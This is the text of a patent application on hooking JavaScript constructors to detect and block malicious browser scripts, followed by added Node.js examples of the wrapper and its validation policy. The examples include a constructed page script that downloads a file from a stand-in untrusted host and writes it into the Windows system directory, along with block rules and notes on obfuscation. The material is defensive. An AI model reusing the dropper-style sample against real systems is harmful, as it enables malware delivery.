(19) United States
(12) Patent Application Publication (10) Pub. No.: US 2007/0113282 A1
Ross (43) Pub. Date: May 17, 2007

US 20070113282A1

(54) SYSTEMS AND METHODS FOR DETECTING AND DISABLING MALICIOUS SCRIPT CODE

(76) Inventor: Robert F. Ross, Rancho Santa Margarita, CA (US)

Correspondence Address:
MACPHERSON KWOK CHEN & HEID LLP
2033 GATEWAY PLACE
SUITE 400
SAN JOSE, CA 95110 (US)

(21) Appl. No.: 11/281,839

(22) Filed: Nov. 17, 2005

Publication Classification

(51) Int. Cl.
G06F 12/14 (2006.01)
G06F 11/00 (2006.01)
(52) U.S. Cl. 726/22; 726/25

(57) ABSTRACT

In accordance with at least one embodiment of the present invention, a device for receiving and processing data content having at least one original function call includes a hook script generator and a script processing engine. The hook script generator is configured to generate a hook script having at least one hook function. Each hook function is configured to supersede a corresponding original function. The script processing engine is configured to receive and process a combination of the hook script and the data content. The hook function corresponding to the data content original function is executed when the original function is called. The hook function provides a run-time detection and control of the data content processing.
`
[Cover drawing, system 200: CLIENT 202 (DISPLAY 220; TRANSCEIVER 230; PROCESSOR 232; PROCESSOR MEMORY 234; PROCESSING ENGINE (WEB BROWSER) 224; DETECTION ENGINE containing SCRIPT INJECTOR (BROWSER PLUG-IN) 242, HOOK SCRIPT GENERATOR 244 and COMMUNICATION OBJECT 246) and SERVER 204 (WEB SERVER holding WEB PAGE #1, WEB PAGE #2 ... WEB PAGE #N; transceiver, processor and memory items 250, 252, 254).]

SYMANTEC Exhibit 1003 Page 1

Patent Application Publication May 17, 2007 Sheet 1 of 6 US 2007/0113282 A1
[Drawing sheet; the rotated figure text did not survive the scan.]

Patent Application Publication May 17, 2007 Sheet 2 of 6 US 2007/0113282 A1
[Drawing sheet; the rotated figure text did not survive the scan.]

Patent Application Publication May 17, 2007 Sheet 3 of 6 US 2007/0113282 A1
[Drawing sheet; the rotated figure text did not survive the scan.]

Patent Application Publication May 17, 2007 Sheet 4 of 6 US 2007/0113282 A1
[Drawing sheet; the rotated figure text did not survive the scan.]

Patent Application Publication May 17, 2007 Sheet 5 of 6 US 2007/0113282 A1
[Drawing sheet; the rotated figure text did not survive the scan.]

Patent Application Publication May 17, 2007 Sheet 6 of 6 US 2007/0113282 A1
[Drawing sheet; the rotated figure text did not survive the scan.]

US 2007/0113282 A1
May 17, 2007

SYSTEMS AND METHODS FOR DETECTING AND DISABLING MALICIOUS SCRIPT CODE
`
TECHNICAL FIELD

[0001] The present invention relates generally to client and server network traffic, and more particularly, for example, to detecting and disabling malicious script code.
`
RELATED ART

[0002] Many computer applications today utilize command scripts to perform a variety of tasks. A command script, or script code, typically is a computer file containing a sequence of text commands and arguments that conform to a particular scripting language convention or standard. An interpreter typically parses (i.e. reads) the script and executes (interprets) the script commands in a sequential manner so that commands at the beginning of a script are parsed and executed before later commands are parsed.

[0003] In contrast, compiled code is typically generated from one or more source code computer files containing a sequence of text commands and arguments that conform to a particular programming language, where the entire sequence of text and arguments is parsed before any commands are executed. Compiled programs require a separate compiling process where the source code is converted to non-human-readable machine code that may be directly executed on a targeted computer platform. Script languages typically take longer to interpret and execute than a compiled language program that is merely executed after compilation, but scripts can be very useful for shorter programs where the slower interpreter speed offsets the compile time overhead for the compiled code.

[0004] Java is the name of a general-purpose programming language that is well suited for use with clients and servers on the World Wide Web (WWW). Smaller Java programs or applications are called Java applets and can be downloaded from a web server and run on a local computer by a Java-enabled web browser such as Microsoft’s Internet Explorer (IE) or Netscape’s Navigator. JavaScript is the name of a common scripting language that was developed originally by Netscape Communications and Sun Microsystems for use in Internet browser applications. JavaScript can be considered a client-side scripting language that is executed by an Internet browser, sometimes known as a web client because it connects to a web server to access web pages. In reference to FIG. 1, a traditional client-server system 100 is shown including a client network device 102 (client) and a server network device 104 (server) that can communicate with each other over a communications network 108 such as the Internet. Client 102 may be connected to Internet 108 through a switched-packet connection 110, while server 104 may be connected to Internet 108 through another switched-packet connection 112, where client 102 and server 104 may exchange message packets comprising network data.

[0005] Client 102 may include a display 120 such as a video monitor, a keyboard 122, and a web browser 124. Server 104 may include a web server 160 configured to provide a plurality of web pages in a download mode to a requesting device such as client 102. Conversely, client 102 may also upload information onto web server 160. Web browser 124 and web server 160 may each be an application program running on a suitably programmed computer system. Web browser 124 may load a web page written in a Hypertext Markup Language (HTML) that contains a portion of embedded JavaScript code. The browser typically includes a built-in interpreter that reads and executes the JavaScript code. JavaScript may be used to automatically change formatted information on the requested web page, cause a linked page to appear in another browser window, and/or cause text and/or graphical images to change during a mouse rollover, for example.

[0006] The number of client side JavaScript attacks is increasing against Java-enabled web browsers such as Microsoft’s Internet Explorer and/or Netscape’s Navigator applications. Many problems have been found with improper classification of web content into security zones. Problems vary from cross-site scripting to the installation of new programs on the exploited host. This proliferation of JavaScript attacks results in pervasive problems spanning financial fraud to spyware installation. Some anti-spyware and anti-adware manufacturers attempted to introduce scripts to block browser pop-up ads, but this approach quickly became obsolete, as the sophistication of modern spyware/adware has increased.

[0007] Anti-virus and security companies have attempted to strike back, but the usual response is to create signatures for known pieces of malicious program code including JavaScript. A signature is like a fingerprint of a particular portion of a program or portion of code that uniquely identifies this code. To avoid detection, some attackers obfuscate their scripts so that the signatures do not match the resulting code. Another method of obfuscation includes string concatenation of the string fragments “ADO”, “DB.”, and “Stream” that may be concatenated into the string “ADODB.Stream”. Alternatively, some attackers have used a Microsoft Script Encoder (screnc.exe) tool to pass the entire script through a text-encoding cipher that replaces the original text of the script file. In this manner, script encoding requires a script viewer to go through a specific decoding process to retrieve the original script code.

[0008] Script-based code execution has many security vulnerabilities and traditional approaches to resolve these security problems have not been sufficiently effective. Signature based detection is one of the strongest tools available other than simply setting a kill bit in the registry, but it is far too simple to circumvent signature based checks. While decoders have emerged to reverse the actions of screnc.exe, string concatenation and other simple programmatic obfuscation techniques have an infinite number of variations with which signatures cannot always keep up. In view of these issues and others, there remains a need in the art for methods and systems that reliably detect malicious script code without relying on string and/or signature detection.
SUMMARY

[0009] Systems and methods are disclosed herein, in accordance with one or more embodiments of the present invention, related to validating script code, such as JavaScript, in a way that checks the final result of the code and doesn’t simply look for strings within the code block. A hook-based detection engine, for example running as JavaScript, may catch the actual method calls regardless of the formatting of the code text, thus providing a far greater ability to detect script-based attacks than traditional security systems and methods.

[0010] More specifically, in accordance with an embodiment of the present invention, a device for receiving and processing data content having at least one original function call includes a hook script generator and a script processing engine. The hook script generator is configured to generate a hook script having at least one hook function. Each hook function is configured to supersede a corresponding original function. The script processing engine is configured to receive and process a combination of the hook script and the data content. The hook function corresponding to the data content original function is executed when the original function is called. The hook function provides a run-time detection and control of the data content processing.
`
[0011] In accordance with another embodiment of the present invention, a web client device includes a transceiver, a detection engine, and a script processing engine. The transceiver is configured to receive a data content from a network. The data content includes at least one original function call. The detection engine includes a hook script generator configured to generate a hook script including at least one hook function. Each hook function is configured to supersede a corresponding original function. The script processing engine is configured to receive and process the hook script and the data content. The hook function corresponding to the data content original function is executed when the original function is called. The hook function provides a run-time detection and control of the data content processing.
`
[0012] In accordance with yet another embodiment of the present invention, a method of processing data content includes the operations of generating a hook script having at least one hook function where each hook function is configured to supersede a corresponding original function, loading the hook script into a script processing engine configured to call and execute one or more hook and original functions, loading data content having at least one original function into the script processing engine, and executing a hook function when a corresponding original function is called in the data content.
`
[0013] A computer readable medium on which is stored a computer program for executing instructions, comprising the operations of generating a hook script having at least one hook function where each hook function is configured to supersede a corresponding original function, loading the hook script into a script processing engine configured to call and execute one or more hook and original functions, loading data content having at least one original function into the script processing engine, and executing a hook function when a corresponding original function is called in the data content.
`
[0014] The scope of the present invention is defined by the claims, which are incorporated into this section by reference. A more complete understanding of embodiments of the present invention will be afforded to those skilled in the art, as well as a realization of additional advantages thereof, by a consideration of the following detailed description. Reference will be made to the appended sheets of drawings that will first be described briefly.
`
BRIEF DESCRIPTION OF THE DRAWINGS

[0015] FIG. 1 shows a traditional client-server system including a client network device and a server network device that can communicate with each other over a communications network such as the Internet.

[0016] FIG. 2 shows an exemplary client-server system including a client network device (client) and a server network device (server) according to an embodiment of the present invention.

[0017] FIG. 3 shows an example of original script code received as HTTP content, for example, downloading a web page from a web server.

[0018] FIG. 4 shows a combined script including a generated hook script and the original script code shown in FIG. 3, according to an embodiment of the present invention.

[0019] FIG. 5 shows a script validation flow according to an embodiment of the present invention.

[0020] FIG. 6 shows a data flow block diagram illustrating both a structure and a process for detecting and selectively disabling potentially malicious script code according to an embodiment of the present invention.

[0021] Embodiments of the present invention and their advantages are best understood by referring to the detailed description that follows. It should be appreciated that like reference numerals are used to identify like elements illustrated in one or more of the figures.
`
DETAILED DESCRIPTION

[0022] Systems and methods are disclosed herein, in accordance with one or more embodiments of the present invention, to detect and disable potentially malicious script code by the activation of a detection engine that can detect and control the behavior of suspected malicious script code to limit adverse program behaviors while promoting desirable program behaviors.
`
[0023] FIG. 2 shows an exemplary client-server system 200 including a client network device 202 (client) and a server network device 204 (server) according to an embodiment of the present invention. Client 202 and server 204 can communicate with each other over a communications network 208 such as the Internet to exchange information including web content comprising text, image, audio, and/or video data. Client 202 may be considered a web client 202, and may include a display 220 for displaying graphical images and/or producing sound to a user, constituting a user output device; a data entry device 222 for receiving data input from a user, constituting a user input device; and/or a script processing engine 224, such as a web browser 224, for receiving the web content and translating the web content into one or more client actions. A client action may convey output data to a user, including displaying or outputting the text data, image data, video data, interactive control data, and/or the audio data. In this manner, web browser 224 provides a graphical user interface (GUI) to locate and display web pages in order to interactively access text, program, image, as well as sound data available through the World Wide Web (WWW). The terms script processing engine 224 and web browser 224 may be used somewhat interchangeably since a web browser typically includes a script processing engine. Data entry device 222 may include a keyboard for text entry and/or a pointing device for point-and-click information entry by a user. Alternatively, data entry device 222 may be any combination of sensors to detect data entry by a user. Display 220 and keyboard/pointing device 222 comprise a user interface (UI).
`
[0024] Client 202 may include a transceiver 230 for sending and receiving messages on network 210, a processor 232 for executing computations and operations to move and/or transform data within client 202 and control client operations, and a processor memory 234 for storing and retrieving data relevant to client operations. Transceiver 230 may include a device such as a network interface card (NIC) and/or related software for providing communications between client 202 and network 210. Processor 232 may include one or more suitably programmed microprocessors, while processor memory 234 may be any data storage and retrieval system including any combination of a Random Access Memory (RAM), a Read Only Memory (ROM), a register file, a disc drive including magnetic media, and/or an optical memory device as a computer readable medium on which is stored a computer program for executing instructions. Some portion of processor memory 234 may be removable from client 202. Web browser 224 may be implemented as an application program or collection of programs running at least partially on a computer such as processor 232.
`
[0025] To detect potentially malicious script code, client 202 includes a hook-based detection engine 240 that is configured to catch actual script method calls regardless of the formatting of the code text. Detection engine 240 may be implemented by a script, such as a JavaScript, executing on a computer such as processor 232. The JavaScript language uses late binding, which refers to the linking or calling of a process, routine, or object at runtime based on current conditions. Since JavaScript uses late binding, it is possible to replace or modify arguments and functions, thus effectively replacing objects by changing their class constructor function. For the purposes of this disclosure, a constructor is a function that is used to instantiate a new object and returns the newly created instance of that object.
`
[0026] In one embodiment, detection engine 240 includes a script injector 242, a hook script generator 244, and/or a communication object 246. Script injector 242 may intercept incoming data content, such as HTTP data, and introduce the incoming data to script processing engine 224. Incoming data may be, for example, a requested web page delivered over network 208. Script injector 242 may be implemented as a browser plug-in, such as a Multipurpose Internet Mail Extensions (MIME) plug-in, for web browser 224. Hook script generator 244 creates new functions, including constructor functions, which replace the standard JavaScript functions. Alternatively, hook script generator 244 may create a generic hook script off-line for archive or for reading in to a remote client through a network 208 or other delivery means. In this manner, a script manufacturer may design and distribute a hook script for use by a plurality of client end-users. The distributed hook script may be read in to a web browser prior to reading in any web page in order to provide run-time detection and control of the data content processing for the remote client. In another embodiment, some portion or all of detection engine 240 may be physically located away from client 202. Some portion or all of detection engine 240 may be moved onto another platform termed a third device, and may be implemented as another client device (not shown), an auxiliary device operationally connected to client 202 (not shown), and/or a network device that intercepts messages up to and including all traffic between connection networks 208 and 210. In one example, the script injection and generation could be accomplished by the third device.
`
[0027] Communication object 246 is configured to provide a run-time exchange of messages (data) between various processes or threads for programs running on processor 232. In this manner, the output of a particular hooked function and/or routine may be directed towards a particular message receiver, such as another process or a device within client 202 or connected to client 202 via network 210. In one example, communication object 246 can relay data between the script code executing on script processing engine 224 and another process or service including a virus scanning or a security management service.
`
[0028] One example of this type of security management service is a network security application Blink® produced by eEye Digital Security of Aliso Viejo, Calif. Blink® provides an endpoint vulnerability solution that addresses security challenges by preventing a successful attack. The Blink service typically runs in parallel with detection engine 240 and uses one or more communication objects 246 to relay data back and forth between detection engine 240 and the Blink service.
`
[0029] Script injector 242 can be a Multipurpose Internet Mail Extensions (MIME) filter plug-in for use with a traditional browser such as Microsoft’s Internet Explorer (IE) and/or Netscape’s Netscape Navigator. Script injector 242 may also be considered a “pluggable” MIME filter since it may be implemented as a browser plug-in or extension. MIME capability permits the formatting of non-ASCII (American Standard Code for Information Interchange) messages so that they can be sent over a communications link such as the Internet 208. Many e-mail clients and browsers support various MIME types that allow them to send and receive graphics, audio files, video files, and use character sets other than standard ASCII. Further, MIME enabled browsers can typically display or output files that are not in HTML format. MIME is continually evolving as a standard and includes various types with many differences. For reference, an early MIME protocol is defined by an Internet Engineering Task Force (IETF) request for comments (RFC) No. 2045 “Multipurpose Internet Mail Extensions”, also denoted IETF-RFC2045. A new version called S/MIME supports encrypted messages and is referenced in IETF-RFC2633 “S/MIME Version 3 Message Specification”. Script injector 242 is configured to inject the JavaScript that hooks the critical functions and methods before any other HTML in a loading page. In this manner, the script filter injects the JavaScript created by script generator 244. For the purposes of this disclosure, a method is associated with a class in an object-oriented programming environment and is analogous to a procedure, function, or routine that is executed when a method object receives a message. Further, a method argument is an input to a method. A constructor defines actions that are performed when an object is created. A class definition can contain zero or more constructors.
`
[0030] FIG. 3 shows an example of original script code 302 received as data (HTTP) content, for example, downloading a web page from a web server. In one example, an original constructor can be an ActiveXObject( ) function that enables and returns a reference to an automation object. In this example, there are two exemplary actions that the Microsoft.XMLHTTP ActiveXObject can perform; method calls defined as Open and SaveToFile. A client computer can use a Microsoft.XMLHTTP object to send an arbitrary HTTP request, receive the response, and/or have the Microsoft extensible markup language (XML) document object model (DOM) parse that response.
`
[0031] FIG. 4 shows an example of a combined script 402 including a generated hook script 404 and original script code 302 shown in FIG. 3, according to an embodiment of the present invention. Although shown as a single, combined script 402, generated hook script 404 and original script code 302 may be introduced, or injected, into script processing engine 618 individually by any means as long as a hook script function corresponding to an original script function is processed first. The combination of hook script 404 and original script 302 into combined script 402 is not intended as a limitation. In this example, since the requested automation object in the script is “Microsoft.XMLHTTP”, then instead of returning an automation object directly a new object can be created as a wrapper for the automation object. All properties and methods of the XMLHTTP object are present in the new wrapper object, and any method calls may be passed on to the original automation object. In this manner, validity checks can be performed to validate method arguments before allowing the function call. With XMLHTTP, the wrapper could filter out downloads referenced by a file path that includes a uniform resource locator (URL) on untrusted hosts. Also, a wrapper object around ADODB.Stream could allow validation of the file path before allowing a SaveToFile or other method to execute. This could prevent files from being written into the Windows system directory, for example, while still allowing use of the object for other purposes.
`
[0032] Code generation will be used to simplify the process of creating new wrappers for one or more ActiveXObjects. The input to the code generator consists of a description of the object to be wrapped. Some portions of this input include the name of the automation object, the properties of the object, and the methods of the object. Since properties cannot be hooked, they may be loaded and/or set before and/or after calls to various methods. Each method shall be marked with whether it should set properties before the real method call or load them after a method call completes. Some more exotic methods may have custom code provided for them instead of a simple description of how to proxy a specific method call or class. These custom methods will be the key check points for the detection engine. Examples include the SaveToFile method of ADODB.Stream and the Open method of Microsoft.XMLHTTP.
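The code generator of [0032], as an added example that is not part of the patent: generateHookScript reads a description of the automation object (its name, its properties, its methods, and whether each method should set properties on the real object before the call or load them back after it) and emits JavaScript source for a wrapper plus a replacement constructor, which is then loaded ahead of the page script as the injector would do. Custom code for a key check point is inserted here as a pre-call check on the method arguments, a simplification of the patent's "custom code instead of a description". The descriptor fields, the trusted URL prefix, the constructed host that stands in for the browser's ActiveXObject, the page script and all function names are assumptions.

```javascript
// Constructed description of the object to wrap (the patent's Microsoft.XMLHTTP example).
const XMLHTTP_DESCRIPTION = {
  name: "Microsoft.XMLHTTP",
  properties: ["async", "status"],            // mirrored between wrapper and real object
  methods: [
    { name: "open", sync: "before" },         // push wrapper property values to the real object first
    { name: "send", sync: "after" },          // load real object property values back afterwards
  ],
  // Custom check for a key check point; `args`, `real` and `hooks` are in scope in the output.
  custom: {
    open: 'if (String(args[1]).indexOf("http://www.example.com/") !== 0) {' +
          ' hooks.blocked.push(["Microsoft.XMLHTTP", "open"].concat(args)); return false; }',
  },
};

// Emits JavaScript source text; the output expects a parameter named `global`.
function generateHookScript(desc) {
  const id = desc.name.replace(/[^A-Za-z0-9_]/g, "_");
  const out = [];
  out.push("var hooks = global.__hooks = global.__hooks || { blocked: [] };");
  out.push("var Original_" + id + " = global.ActiveXObject;");
  // Wrapper constructor: properties cannot be hooked, so snapshot them from the real object.
  out.push("function Wrapper_" + id + "(real) {", "  this.__real = real;");
  for (const p of desc.properties) out.push("  this." + p + " = real." + p + ";");
  out.push("}");
  for (const m of desc.methods) {
    out.push("Wrapper_" + id + ".prototype." + m.name + " = function () {");
    out.push("  var real = this.__real, args = Array.prototype.slice.call(arguments);");
    if (desc.custom && desc.custom[m.name]) out.push("  " + desc.custom[m.name]);
    if (m.sync === "before") for (const p of desc.properties) out.push("  real." + p + " = this." + p + ";");
    out.push("  var result = real." + m.name + ".apply(real, args);");
    if (m.sync === "after") for (const p of desc.properties) out.push("  this." + p + " = real." + p + ";");
    out.push("  return result;", "};");
  }
  // Replacement constructor: hand back the wrapper for this progId, the real object otherwise.
  out.push("global.ActiveXObject = function (progId) {");
  out.push("  var real = new Original_" + id + "(progId);");
  out.push("  return progId === " + JSON.stringify(desc.name) + " ? new Wrapper_" + id + "(real) : real;");
  out.push("};");
  return out.join("\n");
}

// Constructed host standing in for the browser's real ActiveXObject (no COM runtime here).
function makeHost() {
  const host = {};
  host.ActiveXObject = function (progId) {
    if (progId !== "Microsoft.XMLHTTP") throw new Error("unknown progId " + progId);
    const real = { async: false, status: 0, log: [] };
    real.open = function (method, url) { real.log.push(["open", method, url, real.async]); return true; };
    real.send = function () { real.status = 200; real.log.push(["send"]); return true; };
    return real;
  };
  return host;
}

// Constructed page script: one request inside the policy, then one to a host outside it.
const PAGE_SCRIPT = `
  var x = new ActiveXObject("Microsoft.XMLHTTP");
  x.async = true;
  x.open("GET", "http://www.example.com/data.xml");
  x.send();
  x.open("GET", "http://untrusted.invalid/other");
  return x;
`;

// The injector's job: load the generated hook script before the page's own script runs.
function runWithGeneratedHooks(pageScript) {
  const host = makeHost();
  new Function("global", generateHookScript(XMLHTTP_DESCRIPTION))(host);
  const page = new Function("ActiveXObject", pageScript)(host.ActiveXObject);
  return { page, blocked: host.__hooks.blocked };
}

console.log(generateHookScript(XMLHTTP_DESCRIPTION));
```

Running runWithGeneratedHooks(PAGE_SCRIPT) shows the two halves of the descriptor at work: the `async` value set on the wrapper reaches the real object before `open` runs, the `status` set by the real `send` is visible on the wrapper afterwards, and the second `open` never reaches the real object but is recorded under `__hooks.blocked`.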
`
[0033] FIG. 5 shows an exemplary script validation flow 500 according to an embodiment of the present invention. Flow 500 shows a process of hooking one or more functions in the received content and selectively disabling potentially malicious methods or functions by validating the method or function arguments and/or run-time conditions before allowing the execution of a potentially malicious function call. Flow 500 includes the operations of creating 502 a new replacement function or constructor, saving 504 a reference to the original function or constructor, and replacing 506 the original function or constructor with a new replacement function or constructor that acts as a wrapper for the original function or constructor. Flow 500 continues in operation 508 depending on whether the new replacement (hook) function is a constructor. If the new replacement function is a constructor, flow 500 continues with creating 510 a new wrapper object when called, and executing 512 the modified script with the new object behaving as a gateway to allow, modify, or disable certain script behaviors. Operation 512 may occur without operation 510 in cases where the hooked function is a simple non-constructor function. These allowed or inhibited behaviors can include particular script commands, script command argument combinations, and/or method, argument, and property combinations.
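Flow 500 and the wrapper described for FIG. 4 in [0031], worked as an added JavaScript example that is not the patent's code and runs under Node.js: operations 502 through 512 are marked in comments, the hook script is installed before the page script runs, and each wrapped method validates its arguments before either passing the call to the real object or disabling it and reporting through a stand-in for communication object 246. The browser's ActiveXObject is replaced by a constructed fake because no COM runtime exists here; the policy (trusted host list, protected system directory), the fake object shapes, the sample page script and the function names are assumptions.

```javascript
// Constructed stand-in for the host's ActiveXObject constructor. Each fake
// automation object records the calls that actually reached it.
function FakeActiveXObject(progId) {
  const real = { progId, calls: [] };
  if (progId === "Microsoft.XMLHTTP") {
    real.open = (method, url) => { real.calls.push(["open", method, url]); return true; };
    real.send = () => { real.calls.push(["send"]); return true; };
  } else if (progId === "ADODB.Stream") {
    real.Type = 2;                                   // adTypeText; page scripts set 1 for binary
    real.SaveToFile = (path, mode) => { real.calls.push(["SaveToFile", path, mode]); return true; };
  } else {
    throw new Error("Automation server can't create object: " + progId);
  }
  return real;
}
globalThis.ActiveXObject = FakeActiveXObject;

// Stand-in for communication object 246: the hook reports each disabled call here.
const detections = [];
function report(progId, method, args, reason) {
  detections.push({ progId, method, args, reason });
}

// Assumed policy. A validator returns null to allow the call or a reason string to block it.
const TRUSTED_HOSTS = new Set(["www.example.com"]);
const SYSTEM_DIR = /^[a-z]:\\windows\\/i;
const checks = {
  "Microsoft.XMLHTTP": {
    open: (method, url) => {
      let host;
      try { host = new URL(String(url)).hostname; } catch (e) { return "unparseable URL"; }
      return TRUSTED_HOSTS.has(host) ? null : "untrusted host " + host;
    },
  },
  "ADODB.Stream": {
    SaveToFile: (path) => (SYSTEM_DIR.test(String(path)) ? "write into Windows system directory" : null),
  },
};

// Flow 500: 502 create the replacement constructor, 504 save the original, 506 replace it.
function installHooks(host) {
  if (host.ActiveXObject.isHook) return;             // already installed
  const original = host.ActiveXObject;               // 504
  function HookedActiveXObject(progId) {             // 502
    const real = new original(progId);
    const rules = checks[progId] || {};
    const wrapper = {};                              // 510: wrapper object returned instead of the real one
    for (const name of Object.keys(real)) {
      if (typeof real[name] !== "function") {
        // Properties cannot be hooked; accessors keep wrapper and real object in step.
        Object.defineProperty(wrapper, name, {
          enumerable: true, get: () => real[name], set: (v) => { real[name] = v; },
        });
        continue;
      }
      wrapper[name] = function (...args) {           // 512: the wrapper acts as a gateway
        const check = rules[name];
        const reason = check ? check(...args) : null;
        if (reason) { report(progId, name, args, reason); return false; }   // disable the call
        return real[name].apply(real, args);                                // pass it through
      };
    }
    return wrapper;
  }
  HookedActiveXObject.isHook = true;
  host.ActiveXObject = HookedActiveXObject;          // 506
}

// Constructed original script code in the shape of 302: a download via XMLHTTP and a
// write via ADODB.Stream, one call of each inside the policy and one outside it.
const ORIGINAL_SCRIPT = `
  var x = new ActiveXObject("Microsoft.XMLHTTP");
  x.open("GET", "http://www.example.com/update.txt");
  x.open("GET", "http://untrusted.invalid/file.bin");
  var s = new ActiveXObject("ADODB.Stream");
  s.Type = 1;
  s.SaveToFile("C:\\\\Windows\\\\system32\\\\dropped.bin", 2);
  s.SaveToFile("C:\\\\Temp\\\\notes.txt", 2);
  return { xmlhttp: x, stream: s };
`;

// Hooks go in first, then the page script runs against the hooked constructor.
function runWithHooks() {
  installHooks(globalThis);
  detections.length = 0;
  const result = new Function(ORIGINAL_SCRIPT)();
  return { result, detections: detections.slice() };
}

console.log(JSON.stringify(runWithHooks().detections, null, 1));
```

The page script is untouched and still calls `new ActiveXObject(...)` by name; because the binding is resolved at run time, the call lands in HookedActiveXObject, and obfuscating the script text (string concatenation of the progId, encoding) does not change which method the wrapper sees. The `isHook` guard keeps a second installHooks call from wrapping the wrapper.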
`
[0034] FIG. 6 shows an exemplary data flow block diagram 600 illustrating both a structure and a process for detecting and selectively disabling potentially malicious script code according to an embodiment of the present invention. As a structure, data (HTTP) content 602, such as downloaded from a web page, is received by a script injector/filter (browser plug-in) 604 which is an exemplary embodiment of script filter 242 (FIG. 2). Data content 602 may include a script program with one or more original functions for execution on the receiving client. A hook script generator 606 may receive some portion or all of data content 602 and supply a generated script code including one or more hook functions configured to replace corresponding original functions. Hook script generator 606 is an exemplary embodiment of script generator 244 (FIG. 2). This process of substituting an original function or method with a filtered function can be denoted instantiating a “hooked” process. Alternatively, data content 602 that does not include a script and/or an original function corresponding to a hook function would simply be received and processed without modification.
`
[0035] Hook script generator 606 may receive input from one or more simple hook templates 610, one or more predetermined hook functions and objects 612, and/or object template data 614. Using one or more of these as input, hook script generator 606 produces a hook script, such as a JavaScript output that may consist of hook functions, new objects that will be used as replacements when the appropriate constructor is invoked, and/or new constructors that will return the hooked objects in place of the standard objects. These hooks are installed before any other script on the web page loads, ensuring that any script provided as a part of the data content 602, such as a web page, will call the new hooked functions. The generated (hooked) script code supplied to script filter 604 may be passed to a script processing engine 618, which may be implemented as a stand-alone computer program running as an executed script. Alternatively, script processing engine 618 may be included as an operational portion of a web browser, which may be implemented as an application program running on a computer such as processor 232 (FIG. 2). Script processing engine 618 may communicate to a script relay interface 622 by passing messages through a commu
